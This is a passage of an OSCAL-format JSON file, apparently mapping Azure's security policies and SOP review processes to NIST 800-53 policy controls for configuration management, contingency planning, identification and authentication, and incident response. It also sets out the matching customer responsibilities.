The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"3792a95a-fcbe-423a-9356-43bef450013a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-004"}],"description":"The customer is responsible for reviewing and updating the current assessment, authorization, and monitoring policy on a regular basis and following organization defined events. The customer is responsible for reviewing and updating the current assessment, authorization, and monitoring procedures on a regular basis and following organization defined events.","provided-uuid":"7d03beb6-d073-45c1-a8c0-ab0cd424cb61"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8b20c0a9-54cf-4522-922e-c8c3c3bec4e3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-1","statements":[{"uuid":"33d69cee-d40e-4954-8fed-1e6fc83058f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-1_smt.a","by-components":[{"uuid":"0cdc5579-920a-445f-8212-46dd818e2e52","export":{"provided":[{"uuid":"1f822e43-c9c8-4389-8eea-054b5cb1394e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-001"}],"description":"Azure addresses the configuration management policy as part of the Microsoft security policies, of which 
there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. The MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Purpose of providing rules and requirements to applicable personnel * Scope covering properties and services * Roles and responsibilities for those involved with the policy * Management commitment through coordination with security organizations, property security groups, and Microsoft corporate functions * Compliance by requiring all employees to adhere to the policy and applicable standards and follow approved procedures Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. 
Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with configuration management are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nAzure implements the configuration management policy and associated controls through the following documents: * Azure Security Baseline Governance Standard Operating Procedure (SOP) * Azure Asset Management Standard Operating Procedure (SOP) * Azure Hardware Change and Release Management Standard Operating Procedure (SOP) * Azure Software Change and Release Management Standard Operating Procedure (SOP) * Microsoft Change Management Standard * Microsoft Security Standards * Microsoft Online Services Baseline Security Configuration Document They document the following configuration management procedures: * Change control documentation, maintenance, retention, and approvals * Configuration baselines * Component inventory * Configuration settings * Segregation of duties for change management activities * Asset classification Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with configuration management are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"dab95d93-7e91-4414-aa34-45652b63ef7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-001"}],"description":"The customer is responsible for developing, documenting, and disseminating configuration management policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the configuration management policy and the associated configuration management controls.","provided-uuid":"1f822e43-c9c8-4389-8eea-054b5cb1394e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"20304f8d-5bad-4b63-a682-f0fd22ce67dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-1_smt.b","by-components":[{"uuid":"652900f0-0748-4774-86c4-41da0765908f","export":{"provided":[{"uuid":"c93d06b7-febb-42d3-9df2-70c9fc938c9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with 
approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"03b4720f-f1f4-42f9-8f02-dd6e787cfa4f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the configuration management policy and procedures.","provided-uuid":"c93d06b7-febb-42d3-9df2-70c9fc938c9d"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4da2a642-a424-4b99-bbd7-ef4953b6e65c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-1_smt.c","by-components":[{"uuid":"5c302e7a-914a-42ef-805b-a37cf86321a4","export":{"provided":[{"uuid":"a9bd30e8-32bc-490f-aaef-168d8c22e767","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"5bfbd331-4832-4d52-a1ff-5368fd0f092a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-004"}],"description":"The customer is responsible for reviewing and updating the current configuration management policy on a regular basis and following organization defined events.","provided-uuid":"a9bd30e8-32bc-490f-aaef-168d8c22e767"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f549b7da-7c1e-4f2a-8d56-22465b245924","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-1","statements":[{"uuid":"e696344b-e669-426d-94a3-3a603212ee77","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cp-1_smt.a","by-components":[{"uuid":"53b6032e-7c66-47f1-a4a8-0f2ff8d8bee5","export":{"provided":[{"uuid":"f0164b65-588f-45c4-820c-3bdc48e056fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-001"}],"description":"Azure addresses the contingency planning policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that 
have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Business continuity process * Alternate systems facilities * Service resiliency Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. The Azure BCM System Manual is maintained in the Azure Business Continuity and Disaster Recovery (BCDR) website on the Microsoft intranet. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with contingency planning are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Business Continuity and Disaster Recovery Standard Operating Procedure (SOP) implements the contingency planning policy and associated controls. Azure also implements policy and procedures through the Business Continuity Management (BCM) System Manual managed by the C+AI Azure Business Continuity Management team. The purpose of this manual is to document the BCM methods and approach to be implemented by Azure services, internal Azure groups, and support functions. It defines the purpose of the program and sets forth the drivers, goals, objectives, and strategies that are used as guiding principles. The BCM program is in alignment with those of Microsoft's Enterprise Business Continuity Management (EBCM) Program. The SOP and BCM System Manual document the following procedures: * Continuity management process * Business impact and dependency analysis * Writing and implementing continuity plans * Continuity planning framework Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with contingency planning are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"15e44393-d399-45ee-ace9-14e108b58460","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-001"}],"description":"The customer is responsible for developing, documenting, and disseminating contingency planning policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the contingency planning policy and the associated configuration management controls.","provided-uuid":"f0164b65-588f-45c4-820c-3bdc48e056fa"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2f099faf-4c62-4ca9-be80-57dbfc1a15ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cp-1_smt.b","by-components":[{"uuid":"35dd26ed-828f-4f00-ae09-c4f04a0d2d10","export":{"provided":[{"uuid":"8ced1475-5aaa-41b2-a812-5bd6adc7a166","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval 
responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"bc1feef5-3820-455c-975d-a751f8fd79ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the contingency planning policy and procedures.","provided-uuid":"8ced1475-5aaa-41b2-a812-5bd6adc7a166"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b127ab8b-fba6-44e6-b134-532c6e94c8f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cp-1_smt.c","by-components":[{"uuid":"0bc7d196-db8b-4ffe-9c66-e2a98a3ad7cf","export":{"provided":[{"uuid":"12875cf8-753e-4cf4-a460-f2875637467d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"78547d60-1b74-4f05-b1d0-14d8826a0959","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-004"}],"description":"The customer is responsible for reviewing and updating the current contingency planning policy on a regular basis and following organization defined events.","provided-uuid":"12875cf8-753e-4cf4-a460-f2875637467d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"18339a10-d499-41ec-9d65-2a4cec63f876","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-1","statements":[{"uuid":"864d24c1-ea92-4fb9-8815-7ccee431f616","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-1_smt.a","by-components":[{"uuid":"99e1c490-0484-490e-9f70-446879cae695","export":{"provided":[{"uuid":"550e6a5d-418b-402d-9d11-b775798ff692","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-001"}],"description":"Azure addresses the identification and authentication policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft 
personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Identification and authentication of users and components * Unique identifiers * Default user accounts Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. 
Part 2: The Azure Access Control Standard Operating Procedure (SOP) and the Azure Cryptographic Controls SOP implement the identification and authentication policy and associated controls and documents the following procedures: * Identifier management * Authenticator management * User identification and authentication * User authorization * Device identification and authentication * Key management Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nAzure addresses the identification and authentication policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. 
The policy addresses the following: * Identification and authentication of users and components * Unique identifiers * Default user accounts Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. Part 2: The Azure Access Control Standard Operating Procedure (SOP) and the Azure Cryptographic Controls SOP implement the identification and authentication policy and associated controls and documents the following procedures: * Identifier management * Authenticator management * User identification and authentication * User authorization * Device identification and authentication * Key management Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. 
Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"8c4c1681-6c51-4d06-a62b-9d9a6c880877","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-001"}],"description":"The customer is responsible for developing, documenting, and disseminating identification and authentication policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
The customer is responsible for procedures to facilitate the implementation of the identification and authentication policy and the associated identification and authentication controls.","provided-uuid":"550e6a5d-418b-402d-9d11-b775798ff692"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c65e8ff4-551a-4dcd-b20d-62e8b3e50b72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-1_smt.b","by-components":[{"uuid":"d1a0df03-78c7-48e9-be52-1da75c780ed5","export":{"provided":[{"uuid":"31acebc4-82be-4e0c-b98d-ec5c7825a14e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. 
The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"ade6993c-1882-4771-b449-a29661ee18c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the identification and authentication policy and procedures.","provided-uuid":"31acebc4-82be-4e0c-b98d-ec5c7825a14e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"da47bdb7-5ae8-4125-bd36-6f66e4a6fe4c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-1_smt.c","by-components":[{"uuid":"26471866-f11e-4f78-bfe1-d90f385217b7","export":{"provided":[{"uuid":"a4fdec1f-45d9-4b64-b422-acede3cfcf34","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-004"}],"description":"The Azure team updates the Azure SOPs at least 
annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"6705e052-7a40-4fdb-8d96-2774c7f3da3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-004"}],"description":"The customer is responsible for reviewing and updating the current identification and authentication policy on a regular basis and following organization defined events.","provided-uuid":"a4fdec1f-45d9-4b64-b422-acede3cfcf34"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6339599b-c437-46d2-a3c4-ef7594820974","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-1","statements":[{"uuid":"2836287c-9486-4293-9860-63eda7f055eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-1_smt.a","by-components":[{"uuid":"c0c4b9c5-17e5-4f99-8c44-3778ab854a25","export":{"provided":[{"uuid":"ca68766c-818c-478e-9a83-e7fd8e08b099","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-001"}],"description":"Azure addresses the incident management policy as part of 
the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all personnel involved in designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Incident management * Procedures and training * Incident evidence * Incident management capabilities Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with incident management are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Incident Management Standard Operating Procedure (SOP) implements the incident management policy and associated controls and documents the following procedures: * Notification processes * Security incident data collection and analysis processes * A security incident documentation template and repository * An internal and external communication plan * Recovery procedures for system failures, data corruption, loss or denial of service, and total service compromise incidents * A process for post-mortem analysis Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with incident management are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"f00bc434-f500-4251-b8a4-ba44c15046b7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-001"}],"description":"The customer is responsible for developing, documenting, and disseminating incident response policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the incident response policy and the associated incident response controls.","provided-uuid":"ca68766c-818c-478e-9a83-e7fd8e08b099"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cb91554a-9065-4172-91b7-0b5f38df9561","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-1_smt.b","by-components":[{"uuid":"ff742bd8-8d81-47a2-842c-744d70c5f507","export":{"provided":[{"uuid":"e668c0b3-02af-49d3-ae11-2f08d376690c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. 
